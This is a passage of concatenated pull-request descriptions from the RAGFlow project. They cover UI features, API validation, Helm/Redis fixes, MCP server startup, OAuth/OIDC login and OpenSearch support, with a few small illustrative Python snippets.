- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add FormContainer component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix HTTP API Create/Update dataset parser config default value error
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Adds support for the GPT-4.1 series from OpenAI.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Hello, we are using ragflow as a backend service, so we need to manage
agents from our own frontend. This PR therefore adds HTTP APIs to manage
agents.
The code logic is copied and modified from the `rm` and `save` methods
in `api/apps/canvas_app.py`.
By the way, I found that the `save` method in `canvas_app.py` actually
allows renaming an agent to a title that already exists, so I kept that
behavior in the HTTP API. I'm not sure if this is intentional.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Since `import markdown.markdown` has been changed to `import markdown`
in `rag/app/naive.py`, the previous code for converting markdown tables
called the markdown module instead of a callable function. This causes
an error.
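The underlying Python behavior is easy to reproduce. To stay dependency-free, the sketch below uses the standard-library `html` module as a stand-in for `markdown`; the same pattern applies to any module that contains a function you meant to call.

```python
import html

try:
    html("1 < 2")  # calling the module itself, like markdown(...) after `import markdown`
    error = None
except TypeError as exc:
    error = str(exc)

# Calling the function inside the module works, like markdown.markdown(...).
escaped = html.escape("1 < 2")
print(error)
print(escaped)
```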
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Modified the chart to retain persistent volumes by default when the
chart is uninstalled, following established best practices in the Helm
community (e.g., Bitnami charts)
### What problem does this PR solve?
Previously, deleting the helm chart would automatically remove all
persistent data, which poses a risk of accidental data loss.
### Rationale
This change aligns with industry standards to safeguard data by
requiring explicit action to remove persistence, rather than making
deletion the default behavior.
### Impact:
Users who intentionally want to remove persistent data will need to do
so manually or by setting appropriate flags during chart uninstallation.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
As RAGFlow has an integration with Langfuse, this docs page shows how to
configure Langfuse tracing.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the update dataset HTTP
API, improving code clarity and robustness. Key changes include:
1. Pydantic Validation
2. Error Handling
3. Test Updates
4. Documentation Updates
5. fix bug: #5915
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Fixes bug & regression introduced by [PR #7187 - refactor: Update Redis
configuration to use StatefulSet instead of deployment with
pvc](https://github.com/infiniflow/ragflow/pull/7187):
1. Fixes bug #7403 - `redis.persistence.enabled` missing from
`helm/values.yaml` causes helm error:
[ERROR] templates/: template: ragflow/templates/redis.yaml:55:24:
executing "ragflow/templates/redis.yaml" at
<.Values.redis.persistence.enabled>: nil pointer evaluating interface
{}.enabled
2. Fixes regression: reverts hardcoded redis.storage.capacity value back
to using variable `redis.storage.capacity` from `helm/values.yaml`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
1. The MySQL instance is configured with max_connections=1000,
but our connection pool was limited to max_connections: 100.
This mismatch caused connection pool exhaustion during performance
testing.
2. Increase stale_timeout to resolve #6548
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Cross-language query #7376 #4503 #5710 #7470
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
KB detail now supports returning the total document size.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add scheduled workflow for daily HTTP API full tests
Configure cron job to trigger at 16:00:00Z(00:00:00+08:00)
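The two timestamps in the schedule line denote the same instant. A quick check with the standard library illustrates this; the calendar date is an arbitrary assumption, since only the time of day matters:

```python
from datetime import datetime, timedelta, timezone

# Arbitrary example date (assumption); the cron trigger time is 16:00:00 UTC.
utc_trigger = datetime(2025, 1, 1, 16, 0, 0, tzinfo=timezone.utc)

# Convert the UTC trigger time to the UTC+08:00 offset.
utc_plus_8 = timezone(timedelta(hours=8))
local_trigger = utc_trigger.astimezone(utc_plus_8)

print(local_trigger.isoformat())  # 2025-01-02T00:00:00+08:00
```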
### Type of change
- [X] CI update
### What problem does this PR solve?
Feat: Replace the submit form button with ButtonLoading #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Two cases arise when the local ES tag search returns results that are then filtered out by score:
1. The doc gets an empty tag and the LLM is not visited.
2. The code may use empty examples in the prompt for the LLM tag search.
Co-authored-by: huangfuqunze <huangfuqunze.hfqz@alibaba-inc.com>
### What problem does this PR solve?
The parameter positions were incorrect and have been corrected to use
keyword argument passing
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the operation cell of the table on the file management page
and dataset page #3221.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: the deepseek-ai/deepseek-vl2 model cannot be selected as a VL model to
parse PDF images. Also add configs for other VL models from SiliconFlow.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: unknown <taoshi.ln@chinatelecom.cn>
### What problem does this PR solve?
Add `/login/channels` route and improve auth logic to support frontend
integration with third-party login providers:
- Add `/login/channels` route to provide authentication channel list
with `display_name` and `icon`
- Optimize user info parsing logic by prioritizing `avatar_url` and
falling back to `picture`
- Simplify OIDC token validation by removing unnecessary `kid` checks
- Ensure `client_id` is safely cast to string during `audience`
validation
- Fix typo
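
The avatar fallback and the string-safe audience check described above can be sketched as follows. This is a minimal illustration, not the PR's code: the helper names `pick_avatar` and `audience_matches` and the shape of the dictionaries are assumptions.

```python
from typing import Optional


def pick_avatar(user_info: dict) -> Optional[str]:
    """Prefer `avatar_url`; fall back to `picture` when it is missing or empty."""
    return user_info.get("avatar_url") or user_info.get("picture")


def audience_matches(claims: dict, client_id) -> bool:
    """Compare the token's `aud` claim against the client ID as a string."""
    expected = str(client_id)  # client_id may be configured as an int
    aud = claims.get("aud")
    # `aud` may be a single value or a list of values.
    audiences = aud if isinstance(aud, list) else [aud]
    return expected in [str(a) for a in audiences]


print(pick_avatar({"picture": "https://example.com/p.png"}))
print(audience_matches({"aud": "123"}, 123))
```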
---
- Related pull request: #7379
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
Fix: When the knowledge bases of multiple tenants are shared with one person
and this person queries the knowledge bases of both tenants, only the
first tenant's knowledge base is queried.
Co-authored-by: 杜有强 <duyq@internal.ths.com.cn>
### What problem does this PR solve?
1. Add delete_by_ids method
2. Add get_doc_ids_by_doc_names
3. Improve user_canvas_version's logic (avoid O(n) db IO)
4. Improve document delete logic (avoid O(n) db IO)
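
The idea of replacing O(n) per-row database calls with one batched statement can be sketched like this. It is only an illustration under stated assumptions: `sqlite3` and the `document` table stand in for the project's real database layer, and this `delete_by_ids` is a hypothetical helper, not the method the PR adds.

```python
import sqlite3


def delete_by_ids(conn: sqlite3.Connection, ids) -> int:
    """Delete all rows whose id is in `ids` with a single statement."""
    ids = list(ids)
    if not ids:
        return 0
    placeholders = ",".join("?" for _ in ids)
    cur = conn.execute(f"DELETE FROM document WHERE id IN ({placeholders})", ids)
    conn.commit()
    return cur.rowcount


# Hypothetical in-memory table used only for the demonstration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE document (id TEXT PRIMARY KEY, name TEXT)")
conn.executemany(
    "INSERT INTO document VALUES (?, ?)",
    [("a", "x.pdf"), ("b", "y.pdf"), ("c", "z.pdf")],
)

deleted = delete_by_ids(conn, ["a", "c"])  # one round trip instead of two
remaining = [row[0] for row in conn.execute("SELECT id FROM document")]
```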
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: 马继龙 <majilong@ideal.com>
### What problem does this PR solve?
Fix: After deleting the file from the file management menu, it was not
removed from the MinIO bucket.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: liuzhenghua-jk <liuzhenghua-jk@360shuke.com>
### What problem does this PR solve?
This is a follow-up of #7088, adding a knowledge base type input to the
`Begin` component, and a knowledge base selector to the agent flow debug
input panel:

then you can select one or more knowledge bases when testing the agent:

Note: the lines changed in `agent/component/retrieval.py` after line 94
are modified by `ruff format` from the `pre-commit` hooks, no functional
change.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7466
I think this happens because sometimes we cannot get the position.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
When parsing documents containing images, the current code uses a
single-threaded approach to call the VL model, resulting in extremely
slow parsing speed (e.g., parsing a Word document with dozens of images
takes over 20 minutes).
By switching to a multithreaded approach to call the VL model, the
parsing speed can be improved to an acceptable level.
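
A minimal sketch of the multithreaded approach, assuming the VL-model call is a blocking, I/O-bound function. `describe_image` is a hypothetical stand-in for that call, and the worker count is an arbitrary choice:

```python
import time
from concurrent.futures import ThreadPoolExecutor


def describe_image(image_id: int) -> str:
    """Hypothetical stand-in for one blocking VL-model request."""
    time.sleep(0.05)  # simulate network latency
    return f"description of image {image_id}"


def describe_all(image_ids, max_workers: int = 8):
    # executor.map preserves input order, so results line up with image_ids.
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        return list(executor.map(describe_image, image_ids))


results = describe_all(range(16))
```

Threads fit here because the time is spent waiting on the model service rather than on local computation.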
### Type of change
- [x] Performance Improvement
---------
Co-authored-by: liuzhenghua-jk <liuzhenghua-jk@360shuke.com>
### What problem does this PR solve?
Fixed an error that occurred when variables of the begin component are
declared with a key containing "begin".
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix https://github.com/infiniflow/ragflow/issues/7224 and
https://github.com/infiniflow/ragflow/issues/6793
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Fix instructions for Ollama
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
1. Use `host.docker.internal` as base URL
2. Fix numbers in list
3. Make clear what is the console input and what is the output
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix: `field_map` was incorrectly persisted. #7412
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the style of the dataset page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Change the default delimiter value for dataset creation to r'\n'.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the dataset list page style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix #6600
Hello, I have the same business requirement as #6600. My use case is:
We have many departments (> 20 now and increasing), and each department
has its own knowledge base. Because the agent workflow is the same, I
want to change the knowledge base on the fly instead of creating agents
for every department.
It now looks like this:

Knowledge bases can be selected from the dropdown, and passed through
the variables in the table. All selected knowledge bases are used for
retrieval.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7407
Based on this context, I think something causes some LLMs to have a
mismatch (the wrong "@xxx" is appended).
So when the LLM cannot be fetched using the fid, falling back to just the
name should be able to fetch it.
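
The fallback can be pictured with a small sketch. The record layout (`llm_name`, `fid`) and the helper `find_llm` are assumptions made for illustration and are not taken from the PR:

```python
from typing import Optional


def find_llm(models, llm_name: str, fid: Optional[str] = None):
    """Look up a model by name and factory ID, then fall back to the name only."""
    if fid is not None:
        for m in models:
            if m["llm_name"] == llm_name and m["fid"] == fid:
                return m
    # Fallback: the "@xxx" suffix may be wrong, so retry with the name alone.
    for m in models:
        if m["llm_name"] == llm_name:
            return m
    return None


# Hypothetical registry used only for the demonstration.
models = [{"llm_name": "qwen-plus", "fid": "Tongyi-Qianwen"}]
hit = find_llm(models, "qwen-plus", fid="WrongFactory")
```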
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Remove unnecessary parameter restrictions in dataset creation API
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Deprecate get_dataset_id_and_document_id fixture, use add_document
instead
### Type of change
- [x] Update test cases
### What problem does this PR solve?
Feat: Using IconFont as an additional icon library #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
When you remove any document from a knowledge base that uses a knowledge
graph, the graph's `removed_kwd` is set to "Y".
However, in the function `graphrag.utils.get_graph`, the `rebuild_graph`
method is skipped and `None` is returned directly while `removed_kwd=Y`,
so the residual part of the graph is abandoned (although the old entity
data still exists in the db).
Besides, the Infinity instance actually skips deleting the graph
components' `source_id` when removing a document. This may produce a wrong
graph after a rebuild.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify background color of Card #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Qwen3 and more LLMs.
Close #7296
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add a language switch drop-down box to the top navigation bar
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the segmented component style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the create dataset HTTP
API, improving code clarity and robustness. Key changes include:
1. Pydantic Validation
2. Error Handling
3. Test Updates
4. Documentation
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Fix: the Redis lock always times out (reorder the logic so the lock is
released first).
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the style of the home page #3321
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Bind data to the agent module of the home page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add support for OAuth2 and OpenID Connect (OIDC) authentication,
allowing OAuth/OIDC authentication using the specified routes:
- `/login/<channel>`: Initiates the OAuth flow for the specified channel
- `/oauth/callback/<channel>`: Handles the OAuth callback after
successful authentication
The callback URL should be configured in your OAuth provider as:
```
https://your-app.com/oauth/callback/<channel>
```
For detailed instructions on configuring **service_conf.yaml.template**,
see: `./api/apps/auth/README.md#usage`.
- Related issues
#3495
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
### What problem does this PR solve?
When updating a chat assistant through the API, if the datasets attached
to the current chat assistant are not empty, setting the datasets to empty
(`"dataset_ids": []`) causes the update to fail with: 'dataset_ids' can't
be empty
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add AsyncTreeSelect component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Currently, GraphRAG’s LOOP_PROMPT causes the model to keep appending
entities and relationships even after outputting “Y,” which wastes time.
Referring to the latest code in
[graphRAG](https://github.com/microsoft/graphrag/blob/main/graphrag/prompts/index/extract_graph.py),
I modified the LOOP_PROMPT, and after verification the updated prompt
reliably outputs “Y” and stops.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: liuzhenghua-jk <liuzhenghua-jk@360shuke.com>
### What problem does this PR solve?
The 0.18.0 MCP server cannot start after an upgrade from 0.17.2 or on a new
install unless all Docker images are rebuilt.
Close #7321
The MCP server cannot start automatically from Docker:
2025-04-25 17:30:44,512 INFO 25 task_executor_2a9f3e2de99a_0 reported
heartbeat: {"name": "task_executor_2a9f3e2de99a_0", "now":
"2025-04-25T17:30:44.509+08:00", "boot_at":
"2025-04-25T16:43:33.038+08:00", "pending": 0, "lag": 0, "done": 0,
"failed": 0, "current": {}}
usage: server.py [-h] [--base_url BASE_URL] [--host HOST] [--port PORT]
[--mode MODE] [--api_key API_KEY]
server.py: error: unrecognized arguments:
Problem:
The start arguments passed to server.py in Docker are incorrect, so the
MCP server fails to start.
Reason:
```
1. docker-compose.yaml
example - --mcp-host-api-key="ragflow-12345678" is wrong. Do not wrap the key in "" or it reports: "api-key wrong"
2. The Docker entrypoint.sh cannot translate the config into the exec command, so we need to map the file from the host into the container
- ./entrypoint.sh:/ragflow/entrypoint.sh
3. Adding just one line of code fixes all the problems
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
- [x] Performance Improvement
---------
Co-authored-by: Yongteng Lei <yongtengrey@outlook.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
In the generate_confirmation_token method, a spelling error was found
with 'tenent_id'. The correct spelling should be 'tenant_id'.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: shengliang xiao <shengliangxiao2024@gmail.com>
With the current config, you get the error "Fail to access
model(gemma-7b-it) using this api key", since the model has been removed
according to the official Groq documentation:
https://console.groq.com/docs/models
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Batch operations on documents in a dataset #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Enhance capability of `list_docs`.
Breaking change: change method from `GET` to `POST`.
### Type of change
- [x] Refactoring
- [x] Enhancement with breaking change
### What problem does this PR solve?
Feat: Create empty document. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Filter document by running status and file type. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Save document metadata #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/6984
1. The Markdown parser supports extracting pictures
2. For Native, when handling Markdown, it will handle images
3. improve merge and
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Save the configuration information of the knowledge base document
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display the document configuration dialog with shadcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR adds support for the latest OpenSearch 2.19.1 as a store engine
and search engine option for RAGFlow.
### Main Benefit
1. OpenSearch 2.19.1 is licensed under the [Apache v2.0 License], which is
much better than Elasticsearch's license.
2. For search, OpenSearch 2.19.1 supports full-text search, vector_search,
and hybrid_search, which are similar to Elasticsearch in schema.
3. For storage, OpenSearch 2.19.1 stores text and vectors, which are quite
similar to Elasticsearch in schema.
### Changes
- Support opensearch_python_connector. I made a lot of adaptations, since
the schema and API/methods of ES and OpenSearch differ in many ways
(knn_search in particular has a significant gap):
rag/utils/opensearch_coon.py
- Support static config adaptations by changing:
conf/service_conf.yaml, api/settings.py, rag/settings.py
- Support some store and search schema changes between OpenSearch and ES:
conf/os_mapping.json
- Support the OpenSearch Python SDK: pyproject.toml
- Support Docker config for OpenSearch 2.19.1:
docker/.env, docker/docker-compose-base.yml, docker/service_conf.yaml.template
### How to use
- I didn't change the priority: ES remains the default doc/search engine.
OpenSearch is used only if DOC_ENGINE=${DOC_ENGINE:-opensearch} is set in
docker/.env.
### Others
Our team tested many docs in our environment using OpenSearch as the
vector database, and it works very well.
All of the config for OpenSearch is necessary.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Yongteng Lei <yongtengrey@outlook.com>
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
### What problem does this PR solve?
Feat: Delete and rename files in the knowledge base #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display document parsing status #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The lock is not released correctly when task_executor is abnormal
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Some models force thinking, resulting in the absence of the think tag in
the returned content
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Sometimes, after we commit the code and open the PR, the CI pipeline fails
the Ruff checks. By including a pre-commit hook, we can identify this
problem early and avoid lost time.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [X] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix the entrypoint file from the docker container to solve #7249
Here is the important part from the logs:
```
docker logs -f ragflow-server
...
usage: server.py [-h] [--base_url BASE_URL] [--host HOST] [--port PORT]
[--mode MODE] [--api_key API_KEY]
server.py: error: unrecognized arguments:
...
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This PR fixes an issue with the MCP server configuration in RAGFlow's
Docker deployment where:
1. Incorrect parameter naming (`--mcp--host-api-key` with double
hyphens) caused server startup failures
2. Port binding conflicts occurred due to unexposed MCP ports in Docker
3. Inconsistent host addressing between `0.0.0.0` and `127.0.0.1` led to
connectivity issues
The changes ensure proper MCP server initialization and reliable
inter-service communication.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### Key Changes
1. **Parameter Correction**:
- Fixed `--mcp--host-api-key` → `--mcp-host-api-key`
### What problem does this PR solve?
Feat: Deleting files in batches. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The knowledge_graph chunk method is deprecated and should no longer be
used. #7184.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Enhance capability of `list_kbs`.
Breaking change: change method from `GET` to `POST`.
### Type of change
- [x] Refactoring
- [x] Enhancement with breaking change
### What problem does this PR solve?
Feat: Show the owner of this knowledge base on the list card. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Even if the knowledge base has slices, the chunk method can be
changed #7115
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Knowledge Graph Extraction Conflict Between Dataset-Level and
File-Specific Configurations #7198
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix retrieval testing wrong pagination. #7171
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Put the knowledge base list related hooks into use-knowledge-request.ts
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Move langfuse configuration to api page #6155
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Filter the knowledge base list using owner #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR changes Redis to be a StatefulSet. In some situations, when the
Redis pod gets rescheduled to another node, it gets stuck in a pending
state because the PVC is attached to another Kubernetes node.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [X] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
When parsing pptx files, some shapes do not contain the `shape_type`
attribute, which causes the original code to throw an exception during
extraction, leading to failure in content extraction. This optimization
introduces handling logic for such anomalous shapes, providing a safer
and more robust processing mechanism.
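
A minimal sketch of this kind of defensive handling. The exception types caught here and the stand-in shape classes are assumptions for illustration; the PR's actual handling logic may differ:

```python
def safe_shape_type(shape):
    """Return the shape's `shape_type`, or None if it cannot be read."""
    try:
        return shape.shape_type
    except (AttributeError, NotImplementedError):
        return None


# Hypothetical stand-ins for shapes found in a pptx file.
class NormalShape:
    shape_type = 1


class UnrecognizedShape:
    @property
    def shape_type(self):
        raise NotImplementedError("shape type not recognized")


class NoTypeShape:
    pass


shapes = (NormalShape(), UnrecognizedShape(), NoTypeShape())
types = [safe_shape_type(s) for s in shapes]
```

Shapes whose type cannot be determined yield `None`, so the caller can skip them or treat them generically instead of aborting extraction.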
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Add mcp self-host mode, a complement of #7084.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add mcp self-host mode documentation, a complement of #7141.
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Hello, I encountered a problem when trying to use an S3 backend
(seaweedfs) for storage in RAGFlow: when calling
`STORAGE_IMPL.get("bucket", "key")`, the actual request sent to S3 is
`bucket/bucket/key`, causing a `NoSuchKey` error.
I compared the code in `s3_conn.py` to `minio_conn.py` and
`oss_conn.py`, then decided to remove the `else` branch in
`use_prefix_path` method, and it works. I didn't configure `prefix_path`
or `bucket` in `s3` section of the `service_conf.yaml`.
I think this is a bug, but not sure.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Add MCP support with a client example.
Issue link: #4344
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Documentation for MCP server
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
If you deploy RAGFlow using Kubernetes, the hostname will change during
a rolling update. This causes the consumer name of the task executor to
change, making it impossible to schedule tasks that were previously in a
pending state.
To address this, I introduced a recovery task that scans these pending
messages and re-publishes them, allowing the tasks to continue being
processed.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: liuzhenghua-jk <liuzhenghua-jk@360shuke.com>
## Problem Description
Multiple files in the RAGFlow project contain closure trap issues when
using lambda functions with `trio.open_nursery()`. This problem causes
